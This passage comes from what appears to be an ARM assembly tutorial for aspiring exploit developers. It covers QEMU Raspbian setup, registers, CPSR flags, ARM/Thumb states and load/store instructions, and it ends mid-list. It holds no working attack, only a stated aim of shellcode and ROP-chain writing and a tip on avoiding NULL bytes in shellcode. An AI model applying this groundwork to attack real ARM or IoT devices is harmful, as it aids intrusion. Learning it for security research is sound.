$ cp <your-raspbian-jessie>.img raspbian.img

Run this command to resize your copy:

$ qemu-img resize raspbian.img +6G

Now start the original Raspbian image with the enlarged image attached as a second hard drive:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-original-raspbian-jessie>.img -redir tcp:5022::22 -no-reboot -hdb raspbian.img

Login and run:

$ sudo cfdisk /dev/sdb

Delete the second partition (sdb2) and create a New partition with all available space. Once the new partition is created, use Write to commit the changes. Then Quit cfdisk.

Resize and check the old partition, then shut down.

$ sudo resize2fs /dev/sdb2
$ sudo fsck -f /dev/sdb2
$ sudo halt

Now you can start QEMU with your enlarged image:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -redir tcp:5022::22

Advanced Networking

In some cases you might want to access all the ports of the VM you are running in QEMU. For example, you run some binary which opens some network port(s) that you want to access/fuzz from your host (Ubuntu) system. For this purpose, we can create a shared network interface (tap0) which allows us to access all open ports (if those ports are not bound to 127.0.0.1). Thanks to @0xMitsurugi for suggesting that this be included in this tutorial.

This can be done with the following commands on your HOST (Ubuntu) system:

azeria@labs:~ $ sudo apt-get install uml-utilities
azeria@labs:~ $ sudo tunctl -t tap0 -u azeria
azeria@labs:~ $ sudo ifconfig tap0 172.16.0.1/24

After these commands you should see the tap0 interface in the ifconfig output.

azeria@labs:~ $ ifconfig tap0
tap0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.16.0.1 netmask 255.255.255.0 broadcast 172.16.0.255
ether 22:a8:a9:d3:95:f1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can now start your QEMU VM with this command:

azeria@labs:~ $ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -net nic -net tap,ifname=tap0,script=no,downscript=no -no-reboot

When the QEMU VM starts, you need to assign an IP to its eth0 interface with the following command:

pi@labs:~ $ sudo ifconfig eth0 172.16.0.2/24

If everything went well, you should be able to reach open ports on the GUEST (Raspbian) from your HOST (Ubuntu) system. You can test this with the netcat (nc) tool (see an example below).
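If netcat is not at hand, the same reachability check can be sketched in a few lines of Python on the host. The function name is made up for this example, and the guest address 172.16.0.2 is the one assigned to eth0 above; which port to probe depends on what your guest is actually listening on.

```python
import socket


def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port can be established."""
    try:
        # create_connection performs the TCP handshake and raises OSError
        # (refused, unreachable, timed out) when the port cannot be reached.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

For example, `port_is_open("172.16.0.2", 22)` would report whether the guest's SSH port is reachable over tap0, assuming the SSH service is running in the guest.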

ARM ASSEMBLY BASICS

Why ARM?

This tutorial is generally for people who want to learn the basics of ARM assembly, especially those of you who are interested in exploit writing on the ARM platform. You might have already noticed that ARM processors are everywhere around you. When I look around me, I can count far more devices that feature an ARM processor in my house than Intel processors. This includes phones, routers, and, not to forget, the IoT devices whose sales seem to explode these days. That said, the ARM processor has become one of the most widespread CPU cores in the world. Which brings us to the fact that, like PCs, IoT devices are susceptible to improper input validation abuse such as buffer overflows. Given the widespread usage of ARM based devices and the potential for misuse, attacks on these devices have become much more common.

Yet, we have more experts specialized in x86 security research than we have for ARM, although ARM assembly language is perhaps the easiest assembly language in widespread use. So, why aren’t more people focusing on ARM? Perhaps because there are more learning resources out there covering exploitation on Intel than there are for ARM. Just think about the great tutorials on Intel x86 Exploit writing by Fuzzy Security or the Corelan Team – Guidelines like these help people interested in this specific area to get practical knowledge and the inspiration to learn beyond what is covered in those tutorials. If you are interested in x86 exploit writing, the Corelan and Fuzzysec tutorials are your perfect starting point. In this tutorial series here, we will focus on assembly basics and exploit writing on ARM.

ARM PROCESSOR VS. INTEL PROCESSOR

There are many differences between Intel and ARM, but the main difference is the instruction set. Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory. It therefore has more operations and addressing modes, but fewer registers than ARM. CISC processors are mainly used in normal PCs, workstations, and servers.

ARM is a RISC (Reduced Instruction Set Computing) processor and therefore has a simplified instruction set (100 instructions or fewer) and more general purpose registers than CISC. Unlike Intel, ARM uses instructions that operate only on registers and uses a Load/Store memory model for memory access, which means that only Load/Store instructions can access memory. Incrementing a 32-bit value at a particular memory address on ARM therefore requires three types of instructions (load, increment, and store): first load the value at that address into a register, then increment it within the register, and finally store it back to memory from the register.
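To make the load, increment, store sequence concrete, here is a toy Python model of it. This is only a sketch: the dictionaries, the address 0x1000 and the helper names are invented for illustration, and the comments show the ARM instruction each step stands in for.

```python
# Toy model: memory is a dict of word addresses, registers a dict of names.
memory = {0x1000: 41}           # hypothetical address holding a 32-bit value
regs = {"r0": 0x1000, "r1": 0}  # r0 holds the address, r1 is scratch


def ldr(rd: str, rn: str) -> None:
    """ldr rd, [rn]: copy the word at the address in rn into rd."""
    regs[rd] = memory[regs[rn]]


def add_imm(rd: str, rn: str, imm: int) -> None:
    """add rd, rn, #imm: arithmetic only ever touches registers."""
    regs[rd] = (regs[rn] + imm) & 0xFFFFFFFF


def str_(rd: str, rn: str) -> None:
    """str rd, [rn]: write rd back to the address in rn."""
    memory[regs[rn]] = regs[rd]


ldr("r1", "r0")          # load
add_imm("r1", "r1", 1)   # increment
str_("r1", "r0")         # store
print(memory[0x1000])
```

On x86, by contrast, a single instruction with a memory operand could perform the same update.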

The reduced instruction set has its advantages and disadvantages. One of the advantages is that instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction). The downside is that fewer instructions means a greater emphasis on the efficient writing of software with the limited instructions that are available. Also important to note is that ARM has two modes, ARM mode and Thumb mode.

More differences between ARM and x86 are:

  • In ARM, most instructions can be used for conditional execution.
  • The Intel x86 and x86-64 series of processors use the little-endian format.
  • The ARM architecture was little-endian before version 3. Since then, ARM processors have been bi-endian and feature a setting which allows for switchable endianness.

There are not only differences between Intel and ARM, but also between the different ARM versions themselves. This tutorial series is intended to keep it as generic as possible so that you get a general understanding of how ARM works. Once you understand the fundamentals, it’s easy to learn the nuances for your chosen target ARM version. The examples in this tutorial were created on a 32-bit ARMv6 (Raspberry Pi 1), therefore the explanations are related to this exact version.

The naming of the different ARM versions might also be confusing:

ARM family    ARM architecture
ARM7          ARM v4
ARM9          ARM v5
ARM11         ARM v6
Cortex-A      ARM v7-A
Cortex-R      ARM v7-R
Cortex-M      ARM v7-M

WRITING ASSEMBLY

Before we can start diving into ARM exploit development we first need to understand the basics of Assembly language programming, which requires a little background knowledge before you can start to appreciate it. But why do we even need ARM Assembly, isn’t it enough to write our exploits in a “normal” programming / scripting language? It is not, if we want to be able to do Reverse Engineering and understand the program flow of ARM binaries, build our own ARM shellcode, craft ARM ROP chains, and debug ARM applications.

You don’t need to know every little detail of the Assembly language to be able to do Reverse Engineering and exploit development, yet some of it is required for understanding the bigger picture. The fundamentals will be covered in this tutorial series. If you want to learn more you can visit the links listed at the end of this chapter.

So what exactly is Assembly language? Assembly language is just a thin syntax layer on top of machine code, which is composed of instructions encoded in binary representations and is what our computer understands. So why don’t we just write machine code instead? Well, that would be a pain in the ass. For this reason, we will write assembly, ARM assembly, which is much easier for humans to understand. Our computer can’t run assembly code itself, because it needs machine code. The tool we will use to assemble the assembly code into machine code is the GNU Assembler from the GNU Binutils project, named as, which works with source files having the *.s extension.

Once you have written your assembly file with the extension *.s, you need to assemble it with as and link it with ld:

$ as program.s -o program.o
$ ld program.o -o program

ASSEMBLY UNDER THE HOOD

Let’s start at the very bottom and work our way up to the assembly language. At the lowest level, we have our electrical signals on our circuit. Signals are formed by switching the electrical voltage to one of two levels, say 0 volts (‘off’) or 5 volts (‘on’). Because just by looking we can’t easily tell what voltage the circuit is at, we choose to write patterns of on/off voltages using visual representations, the digits 0 and 1, to not only represent the idea of an absence or presence of a signal, but also because 0 and 1 are digits of the binary system. We then group the sequence of 0 and 1 to form a machine code instruction which is the smallest working unit of a computer processor. Here is an example of a machine language instruction:

1110 0001 1010 0000 0010 0000 0000 0001

So far so good, but we can’t remember what each of these patterns (of 0 and 1) means. For this reason, we use so-called mnemonics, abbreviations to help us remember these binary patterns, where each machine code instruction is given a name. These mnemonics often consist of three letters, but this is not obligatory. We can write a program using these mnemonics as instructions. This program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer. Therefore, Assembly language is the lowest level used by humans to program a computer. The operands of an instruction come after the mnemonic(s). Here is an example:

MOV R2, R1
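The bit pattern shown earlier is in fact the ARM encoding of this very instruction. As a rough sketch (the function and field names are chosen here for illustration), the word can be split into the fields of the classic ARM data-processing format: condition, immediate flag, opcode, S bit, Rn, Rd and operand 2.

```python
# The machine language instruction from the text, with the spaces removed.
word = int("1110 0001 1010 0000 0010 0000 0000 0001".replace(" ", ""), 2)


def decode_data_processing(word: int) -> dict:
    """Split a 32-bit ARM data-processing instruction into its fields."""
    return {
        "cond": (word >> 28) & 0xF,      # 0b1110 = AL (always execute)
        "immediate": (word >> 25) & 1,   # 0 = operand 2 is a register
        "opcode": (word >> 21) & 0xF,    # 0b1101 = MOV
        "set_flags": (word >> 20) & 1,   # S bit, 0 = leave CPSR flags alone
        "rn": (word >> 16) & 0xF,        # first operand, unused by MOV
        "rd": (word >> 12) & 0xF,        # destination register
        "operand2": word & 0xFFF,        # low 4 bits = Rm when no shift is applied
    }


fields = decode_data_processing(word)
print(hex(word), fields)
```

Here rd is 2 and the low bits of operand2 are 1, which reads back as MOV R2, R1.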

Now that we know that an assembly program is made up of textual information called mnemonics, we need to get it converted into machine code. As mentioned above, in the case of ARM assembly, the GNU Binutils project supplies us with a tool called as. The process of using an assembler like as to convert from (ARM) assembly language to (ARM) machine code is called assembling.

In summary, we learned that computers understand (respond to) the presence or absence of voltages (signals) and that we can represent multiple signals in a sequence of 0s and 1s (bits). We can use machine code (sequences of signals) to cause the computer to respond in some well-defined way. Because we can’t remember what all these sequences mean, we give them abbreviations – mnemonics, and use them to represent instructions. This set of mnemonics is the Assembly language of the computer and we use a program called Assembler to convert code from mnemonic representation to the computer-readable machine code, in the same way a compiler does for high-level languages.

DATA TYPES

This is part two of the ARM Assembly Basics tutorial series, covering data types and registers.

Similar to high level languages, ARM supports operations on different datatypes.
The data types we can load (or store) can be signed and unsigned words, halfwords, or bytes. The extensions for these data types are: -h or -sh for halfwords, -b or -sb for bytes, and no extension for words. The difference between signed and unsigned data types is:

  • Signed data types can hold both positive and negative values and therefore have a smaller positive range.
  • Unsigned data types can hold larger positive values (including zero) but cannot hold negative values, so their positive range is wider.

Here are some examples of how these data types can be used with the instructions Load and Store:

ldr = Load Word
ldrh = Load unsigned Half Word
ldrsh = Load signed Half Word
ldrb = Load unsigned Byte
ldrsb = Load signed Byte

str = Store Word
strh = Store Half Word
strb = Store Byte

(A store only writes the low 16 or 8 bits of the register, so ARM has no separate signed store instructions; strsh and strsb do not exist.)
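The practical difference between the signed and unsigned loads is how the upper bits of the 32-bit register are filled. A minimal Python sketch of the two behaviours follows; the helper names are illustrative and this models the arithmetic only, not the instructions themselves.

```python
def zero_extend(value: int, bits: int) -> int:
    """What ldrb/ldrh do: keep the low bits, fill the rest with zeros."""
    return value & ((1 << bits) - 1)


def sign_extend(value: int, bits: int) -> int:
    """What ldrsb/ldrsh do: replicate the top bit into the upper bits."""
    value &= (1 << bits) - 1
    sign_bit = 1 << (bits - 1)
    return (value ^ sign_bit) - sign_bit


byte_in_memory = 0xFF
print(zero_extend(byte_in_memory, 8))  # ldrb-like view of the byte
print(sign_extend(byte_in_memory, 8))  # ldrsb-like view of the byte
```

The same byte 0xFF reads as 255 with an unsigned load and as -1 with a signed load.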

ENDIANNESS

There are two basic ways of viewing bytes in memory: Little-Endian (LE) or Big-Endian (BE). The difference is the byte-order in which each byte of an object is stored in memory. On little-endian machines like Intel x86, the least-significant-byte is stored at the lowest address (the address closest to zero). On big-endian machines the most-significant-byte is stored at the lowest address. The ARM architecture was little-endian before version 3; since then it has been bi-endian, which means that it features a setting which allows for switchable endianness. On ARMv6 for example, instructions are fixed little-endian and data accesses can be either little-endian or big-endian as controlled by bit 9, the E bit, of the Current Program Status Register (CPSR).
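The two byte orders are easy to see with Python's struct module. This is just an illustration on the host; the value 0x12345678 is an arbitrary example.

```python
import struct

value = 0x12345678

# "<I" packs an unsigned 32-bit integer little-endian, ">I" big-endian.
little = struct.pack("<I", value)
big = struct.pack(">I", value)

# Bytes are listed from the lowest address to the highest.
print(little.hex())
print(big.hex())
```

In the little-endian layout the least-significant byte 0x78 comes first (lowest address), while in the big-endian layout the most-significant byte 0x12 does.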

ARM REGISTERS

The number of registers depends on the ARM version. According to the ARM Reference Manual, there are 30 general-purpose 32-bit registers, with the exception of ARMv6-M and ARMv7-M based processors. The first 16 registers are accessible in user-level mode, the additional registers are available in privileged software execution (with the exception of ARMv6-M and ARMv7-M). In this tutorial series we will work with the registers that are accessible in any privilege mode: r0-r15. These 16 registers can be split into two groups: general purpose and special purpose registers.

The following table is just a quick glimpse into how the ARM registers could relate to those in Intel processors.

R0-R12: can be used during common operations to store temporary values, pointers (locations in memory), etc. R0, for example, can be referred to as the accumulator during arithmetic operations or used for storing the result of a previously called function. R7 becomes useful while working with syscalls as it stores the syscall number, and R11 helps us to keep track of boundaries on the stack, serving as the frame pointer (will be covered later). Moreover, the function calling convention on ARM specifies that the first four arguments of a function are stored in the registers r0-r3.

R13: SP (Stack Pointer). The Stack Pointer points to the top of the stack. The stack is an area of memory used for function-specific storage, which is reclaimed when the function returns. The stack pointer is therefore used for allocating space on the stack, by subtracting the value (in bytes) we want to allocate from the stack pointer. In other words, if we want to allocate a 32 bit value, we subtract 4 from the stack pointer.

R14: LR (Link Register). When a function call is made, the Link Register gets updated with the memory address of the instruction that follows the call. Doing this allows the program to return to the “parent” function that initiated the “child” function call after the “child” function is finished.

R15: PC (Program Counter). The Program Counter is automatically incremented by the size of the instruction executed. This size is always 4 bytes in ARM state and 2 bytes in Thumb state. When a branch instruction is being executed, the PC holds the destination address. During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb(v1) state. This is different from x86, where PC always points to the next instruction to be executed.

Let’s look at how PC behaves in a debugger. We use the following program to store the address of pc into r0 and include two random instructions. Let’s see what happens.

.section .text
.global _start

_start:
 mov r0, pc
 mov r0, #2
 add r1, r0, r0
 bkpt

In GDB we set a breakpoint at _start and run it:

gef> br _start
Breakpoint 1 at 0x8054
gef> run

Here is a screenshot of the output we see first:

$r0 0x00000000   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008054 
$cpsr 0x00000010 

0x8054 <_start> mov r0, pc     <- $pc
0x8058 <_start+4> mov r0, #2
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6

We can see that PC holds the address (0x8054) of the next instruction (mov r0, pc) that will be executed. Now let’s execute the next instruction after which R0 should hold the address of PC (0x8054), right?

$r0 0x0000805c   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008058 
$cpsr 0x00000010

0x8058 <_start+4> mov r0, #2       <- $pc
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6
0x8078 adfcssp f0, f0, #4.0

…right? Wrong. Look at the address in R0. While we expected R0 to contain the previously read PC value (0x8054), it instead holds a value two instructions ahead of it (0x805c). From this example you can see that the debugger shows PC as the address of the next instruction to be executed, but when an instruction reads PC directly, it gets the address of that instruction plus 8 (0x8054 + 8 = 0x805C). This is because older ARM processors always fetched two instructions ahead of the currently executed instruction. The reason ARM retains this definition is to ensure compatibility with earlier processors.
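The rule can be written down as a one-line calculation. The helper below is only a sketch with a made-up name; it encodes the offsets given earlier (plus 8 in ARM state, plus 4 in Thumb state).

```python
def pc_as_read(instr_address: int, thumb: bool = False) -> int:
    """Value an instruction sees when it reads PC as an operand."""
    # Two instructions ahead: 2 * 4 bytes in ARM state, 2 * 2 in Thumb state.
    return (instr_address + (4 if thumb else 8)) & 0xFFFFFFFF


# mov r0, pc located at 0x8054, executed in ARM state
print(hex(pc_as_read(0x8054)))
```

For the instruction at 0x8054 this gives 0x805c, the value that ended up in R0.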

CURRENT PROGRAM STATUS REGISTER

When you debug an ARM binary with gdb, you see something called Flags:

The register $cpsr shows the value of the Current Program Status Register (CPSR) and under that you can see the Flags thumb, fast, interrupt, overflow, carry, zero, and negative. These flags represent certain bits in the CPSR register and are set according to the value of the CPSR and turn bold when activated. The N, Z, C, and V bits correspond to the SF, ZF, CF, and OF bits in the EFLAGS register on x86 (with one caveat: after a subtraction, ARM sets C when no borrow occurred, which is the opposite of x86’s CF). These bits are used to support conditional execution in conditionals and loops at the assembly level. We will cover condition codes in the part on Conditional Execution and Branching.

The picture above shows a layout of a 32-bit register (CPSR) where the left (<-) side holds most-significant-bits and the right (->) side the least-significant-bits. Every single cell (except for the GE and M sections along with the blank ones) is one bit in size. These one-bit sections define various properties of the program’s current state.
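A raw CPSR value, such as the 0x10 seen in the register dumps earlier, can be picked apart with a few shifts and masks. The sketch below assumes the usual ARMv6 bit positions (N=31, Z=30, C=29, V=28, E=9, I=7, F=6, T=5, mode in bits 4..0); the table and function names are invented for this example.

```python
FLAG_BITS = {"N": 31, "Z": 30, "C": 29, "V": 28, "E": 9, "I": 7, "F": 6, "T": 5}

# Processor modes encoded in the M field (bits 4..0).
MODES = {
    0b10000: "User",
    0b10001: "FIQ",
    0b10010: "IRQ",
    0b10011: "Supervisor",
    0b10111: "Abort",
    0b11011: "Undefined",
    0b11111: "System",
}


def decode_cpsr(cpsr: int):
    """Return ({flag: bool}, mode name) for a 32-bit CPSR value."""
    flags = {name: bool((cpsr >> bit) & 1) for name, bit in FLAG_BITS.items()}
    mode = MODES.get(cpsr & 0x1F, "unknown")
    return flags, mode


flags, mode = decode_cpsr(0x10)
print(mode, [name for name, is_set in flags.items() if is_set])
```

For 0x10 no flag bits are set and the mode field decodes to User mode.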

Let’s assume we would use the CMP instruction to compare the numbers 1 and 2. The outcome would be ‘negative’ because 1 – 2 = -1. When we compare two equal numbers, like 2 against 2, the Z (zero) flag is set because 2 – 2 = 0. Keep in mind that the registers used with the CMP instruction won’t be modified, only the CPSR will be modified based on the result of comparing these registers against each other.

This is what it looks like in GDB (with GEF installed). In this example we compare the registers r1 and r0, where r1 = 4 and r0 = 2. This is what the flags look like after executing the cmp r1, r0 operation:

The Carry Flag is set because we use cmp r1, r0 to compare 4 against 2 (4 – 2). In contrast, the Negative flag (N) is set if we use cmp r0, r1 to compare a smaller number (2) against a bigger number (4).

Here’s an excerpt from the ARM infocenter:

The APSR contains the following ALU status flags:

N – Set when the result of the operation was Negative.

Z – Set when the result of the operation was Zero.

C – Set when the operation resulted in a Carry.

V – Set when the operation caused oVerflow.

A carry occurs:

  • if the result of an addition is greater than or equal to 2^32
  • if the result of a subtraction is positive or zero
  • as the result of an inline barrel shifter operation in a move or logical instruction.

Overflow occurs if the result of an add, subtract, or compare is greater than or equal to 2^31, or less than –2^31.
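These rules can be checked with a small Python model of what CMP does to the flags. It is a sketch of the arithmetic only: cmp_flags is a name made up here, and it treats CMP a, b as the 32-bit subtraction a - b whose result is discarded.

```python
MASK = 0xFFFFFFFF


def cmp_flags(a: int, b: int) -> dict:
    """Flags produced by a 32-bit CMP a, b (that is, a - b)."""
    a &= MASK
    b &= MASK
    result = (a - b) & MASK
    return {
        "N": bool(result >> 31),  # result is negative when read as signed
        "Z": result == 0,         # operands were equal
        "C": a >= b,              # no borrow: unsigned a is at least b
        # Signed overflow: the operands have different signs and the
        # sign of the result differs from the sign of a.
        "V": bool(((a ^ b) & (a ^ result)) >> 31),
    }


print(cmp_flags(4, 2))  # cmp r1, r0 with r1 = 4, r0 = 2
print(cmp_flags(2, 4))  # cmp r0, r1 with r0 = 2, r1 = 4
```

Comparing 4 against 2 sets only C, and comparing 2 against 4 sets only N, which matches the description of the GDB example above.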

ARM & THUMB

ARM processors have two main states they can operate in (let’s not count Jazelle here): ARM and Thumb. These states have nothing to do with privilege levels. For example, code running in SVC mode can be either ARM or Thumb. The main difference between these two states is the instruction set, where instructions in ARM state are always 32-bit, and instructions in Thumb state are 16-bit (but can be 32-bit). Knowing when and how to use Thumb is especially important for our ARM exploit development purposes. When writing ARM shellcode, we need to get rid of NULL bytes, and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them.

The naming conventions of ARM versions are more than confusing, and not all ARM versions support the same Thumb instruction sets. At some point, ARM introduced an enhanced Thumb instruction set (pseudo name: Thumbv2) which allows 32-bit Thumb instructions and even conditional execution, which was not possible in the versions prior to that. In order to use conditional execution in Thumb state, the “it” instruction was introduced. However, this instruction was then removed in a later version and exchanged for something that was supposed to make things less complicated, but achieved the opposite. I don’t know all the different variations of ARM/Thumb instruction sets across all the different ARM versions, and I honestly don’t care. Neither should you. The only thing that you need to know is the ARM version of your target device and its specific Thumb support so that you can adjust your code. The ARM Infocenter should help you figure out the specifics of your ARM version (http://infocenter.arm.com/help/index.jsp).

As mentioned before, there are different Thumb versions. The different naming is just for the sake of differentiating them from each other (the processor itself will always refer to it as Thumb).

  • Thumb-1 (16-bit instructions): was used in ARMv6 and earlier architectures.
  • Thumb-2 (16-bit and 32-bit instructions): extends Thumb-1 by adding more instructions and allowing them to be either 16-bit or 32-bit wide (ARMv6T2, ARMv7).
  • ThumbEE: includes some changes and additions aimed at dynamically generated code (code compiled on the device either shortly before or during execution).

Differences between ARM and Thumb:

  • Conditional execution: All instructions in ARM state support conditional execution. Some ARM processor versions allow conditional execution in Thumb by using the IT instruction. Conditional execution leads to higher code density because it reduces the number of instructions to be executed and reduces the number of expensive branch instructions.
  • 32-bit ARM and Thumb instructions: 32-bit Thumb instructions have a .w suffix.
  • The barrel shifter is another feature unique to ARM mode. It can be used to shrink multiple instructions into one. For example, instead of using two instructions for a multiply (multiplying a register by 2 and using MOV to store the result in another register), you can include the multiply inside a MOV instruction by shifting left by 1: MOV R1, R0, LSL #1 ; R1 = R0 * 2

To switch the state in which the processor executes, one of two conditions has to be met:

  • We can use the branch instruction BX (branch and exchange) or BLX (branch, link, and exchange) and set the destination register’s least significant bit to 1. This can be achieved by adding 1 to an offset, like 0x5530 + 1. You might think that this would cause alignment issues, since instructions are either 2- or 4-byte aligned. This is not a problem because the processor will ignore the least significant bit.
  • We know that we are in Thumb mode if the T bit in the current program status register is set.
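The interworking rule described above can be sketched in a few lines of Python. This is only an illustrative model, not an emulator: the function name `bx_target` is made up for this example, and it assumes the T bit sits at bit 5 of the CPSR, as it does on ARMv7-A.

```python
T_BIT = 1 << 5  # assumed position of the Thumb (T) bit in the CPSR (ARMv7-A layout)

def bx_target(target, cpsr):
    """Model BX: bit 0 of the target selects the state, the rest is the address."""
    if target & 1:
        cpsr |= T_BIT          # odd target: switch to (or stay in) Thumb state
    else:
        cpsr &= ~T_BIT         # even target: switch to (or stay in) ARM state
    return target & ~1, cpsr   # bit 0 never becomes part of the branch address

pc, cpsr = bx_target(0x5530 + 1, 0x10)
print(hex(pc), bool(cpsr & T_BIT))
```

Branching to 0x5530 + 1 therefore lands on the aligned address 0x5530 with the T bit set, which is why adding 1 does not cause an alignment problem.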

    INTRODUCTION TO ARM INSTRUCTIONS

    The purpose of this part is to briefly introduce the ARM instruction set and its general use. It is crucial for us to understand how the smallest pieces of the Assembly language operate, how they connect to each other, and what can be achieved by combining them.

    As mentioned earlier, Assembly language is composed of instructions which are the main building blocks. ARM instructions are usually followed by one or two operands and generally use the following template:

    MNEMONIC{S}{condition} {Rd}, Operand1, Operand2

    Due to the flexibility of the ARM instruction set, not all instructions use all of the fields provided in the template. Nevertheless, the purpose of each field in the template is described as follows:

    MNEMONIC     - Short name (mnemonic) of the instruction
    {S}          - An optional suffix. If S is specified, the condition flags are updated on the result of the operation
    {condition}  - Condition that is needed to be met in order for the instruction to be executed
    {Rd}         - Register (destination) for storing the result of the instruction
    Operand1     - First operand. Either a register or an immediate value 
    Operand2     - Second (flexible) operand. Can be an immediate value (number) or a register with an optional shift

    While the MNEMONIC, S, Rd and Operand1 fields are straight forward, the condition and Operand2 fields require a bit more clarification. The condition field is closely tied to the CPSR register’s value, or to be precise, values of specific bits within the register. Operand2 is called a flexible operand, because we can use it in various forms – as immediate value (with limited set of values), register or register with a shift. For example, we can use these expressions as the Operand2:

    #123                    - Immediate value (with limited set of values). 
    Rx                      - Register x (like R1, R2, R3 ...)
    Rx, ASR n               - Register x with arithmetic shift right by n bits (1 <= n <= 32)
    Rx, LSL n               - Register x with logical shift left by n bits (0 <= n <= 31)
    Rx, LSR n               - Register x with logical shift right by n bits (1 <= n <= 32)
    Rx, ROR n               - Register x with rotate right by n bits (1 <= n <= 31)
    Rx, RRX                 - Register x with rotate right by one bit, with extend
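To make the shift types listed above a bit more tangible, here is a minimal Python sketch of what each one does to a 32-bit register value. The helper names are my own and the carry-out of the shifts is ignored (except for RRX, which needs the carry flag as input), so treat it as an approximation of the barrel shifter rather than a full model.

```python
MASK = 0xFFFFFFFF  # registers are 32 bits wide

def lsl(x, n):
    return (x << n) & MASK

def lsr(x, n):
    return (x & MASK) >> n

def asr(x, n):
    # replicate the sign bit (bit 31) while shifting right
    x &= MASK
    if x & 0x80000000:
        x -= 1 << 32
    return (x >> n) & MASK

def ror(x, n):
    n %= 32
    x &= MASK
    return ((x >> n) | (x << (32 - n))) & MASK

def rrx(x, carry):
    # rotate right by one bit through the carry flag; returns (result, new carry)
    x &= MASK
    return ((carry << 31) | (x >> 1)) & MASK, x & 1

print(hex(lsl(2, 1)), hex(asr(0x80000000, 4)), hex(ror(1, 24)))
```

Note how ASR keeps the sign bit while LSR fills with zeros, and how ROR moves the bits that fall off the right end back in on the left.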

    As a quick example of what different kinds of instructions look like, let’s take a look at the following list.

    ADD   R0, R1, R2         - Adds contents of R1 (Operand1) and R2 (Operand2 in a form of register) and stores the result into R0 (Rd)
    ADD   R0, R1, #2         - Adds contents of R1 (Operand1) and the value 2 (Operand2 in a form of an immediate value) and stores the result into R0 (Rd)
    MOVLE R0, #5             - Moves number 5 (Operand2, because the compiler treats it as MOVLE R0, R0, #5) to R0 (Rd) ONLY if the condition LE (Less Than or Equal) is satisfied
    MOV   R0, R1, LSL #1     - Moves the contents of R1 (Operand2 in a form of register with logical shift left) shifted left by one bit to R0 (Rd). So if R1 had value 2, it gets shifted left by one bit and becomes 4. 4 is then moved to R0.
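The condition field can be illustrated with a small Python sketch. It assumes the usual CPSR layout (N, Z, C and V in bits 31 to 28) and only covers a handful of condition codes; the function names are hypothetical and exist purely for this example.

```python
def flags(cpsr):
    """Extract the N, Z, C and V condition flags (CPSR bits 31..28)."""
    return tuple((cpsr >> bit) & 1 for bit in (31, 30, 29, 28))

def condition_passed(cond, cpsr):
    n, z, c, v = flags(cpsr)
    checks = {
        "EQ": z == 1,
        "NE": z == 0,
        "GE": n == v,
        "LT": n != v,
        "GT": z == 0 and n == v,
        "LE": z == 1 or n != v,
        "AL": True,
    }
    return checks[cond]

def movle(r0, imm, cpsr):
    """MOVLE R0, #imm: R0 only changes if the LE condition holds."""
    return imm if condition_passed("LE", cpsr) else r0

print(movle(7, 5, 0x40000000))  # Z flag set, so LE holds
print(movle(7, 5, 0x00000000))  # no flags set ("greater than"), R0 is kept
```

In other words, MOVLE is an ordinary MOV that is silently skipped whenever the flags in the CPSR do not satisfy LE.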

    As a quick summary, let’s take a look at the most common instructions which we will use in future examples.

    MEMORY INSTRUCTIONS: LOAD AND STORE

    ARM uses a load-store model for memory access which means that only load/store (LDR and STR) instructions can access memory. While on x86 most instructions are allowed to directly operate on data in memory, on ARM data must be moved from memory into registers before being operated on. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment, and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

    To explain the fundamentals of Load and Store operations on ARM, we start with a basic example and continue with three basic offset forms with three different address modes for each offset form. For each example we will use the same piece of assembly code with a different LDR/STR offset form, to keep it simple.

    1. Offset form: Immediate value as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    2. Offset form: Register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    3. Offset form: Scaled register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
